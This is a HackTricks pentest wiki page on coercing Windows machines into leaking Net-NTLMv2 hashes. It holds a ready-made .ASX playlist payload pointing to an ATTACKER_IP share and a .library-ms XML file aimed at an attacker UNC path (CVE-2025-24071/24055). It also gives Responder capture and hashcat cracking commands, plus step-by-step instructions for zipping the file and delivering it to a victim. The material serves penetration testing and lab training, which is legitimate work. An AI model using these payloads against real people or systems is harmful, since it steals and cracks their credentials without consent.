hacktricks/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md

Places to steal NTLM creds

{{#include ../../banners/hacktricks-training.md}}

Check all the great ideas from https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and https://github.com/p0dalirius/windows-coerced-authentication-methods

Windows Media Player playlists (.ASX/.WAX)

If you can get a target to open or preview a Windows Media Player playlist you control, you can leak Net‑NTLMv2 by pointing the entry to a UNC path. WMP will attempt to fetch the referenced media over SMB and will authenticate implicitly.

Example payload:

<asx version="3.0">
  <title>Leak</title>
  <entry>
    <title></title>
    <ref href="file://ATTACKER_IP\\share\\track.mp3" />
  </entry>
</asx>

Collection and cracking flow:

# Capture the authentication
sudo Responder -I <iface>

# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)

Windows Explorer insecurely handles .library-ms files when they are opened directly from within a ZIP archive. If the library definition points to a remote UNC path (e.g., \attacker\share), simply browsing/launching the .library-ms inside the ZIP causes Explorer to enumerate the UNC and emit NTLM authentication to the attacker. This yields a NetNTLMv2 that can be cracked offline or potentially relayed.

Minimal .library-ms pointing to an attacker UNC

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <version>6</version>
  <name>Company Documents</name>
  <isLibraryPinned>false</isLibraryPinned>
  <iconReference>shell32.dll,-235</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\10.10.14.2\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Operational steps

• Create the .library-ms file with the XML above (set your IP/hostname).
• Zip it (on Windows: Send to → Compressed (zipped) folder) and deliver the ZIP to the target.
• Run an NTLM capture listener and wait for the victim to open the .library-ms from inside the ZIP.

References

• HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)
• HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
• Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft

{{#include ../../banners/hacktricks-training.md}}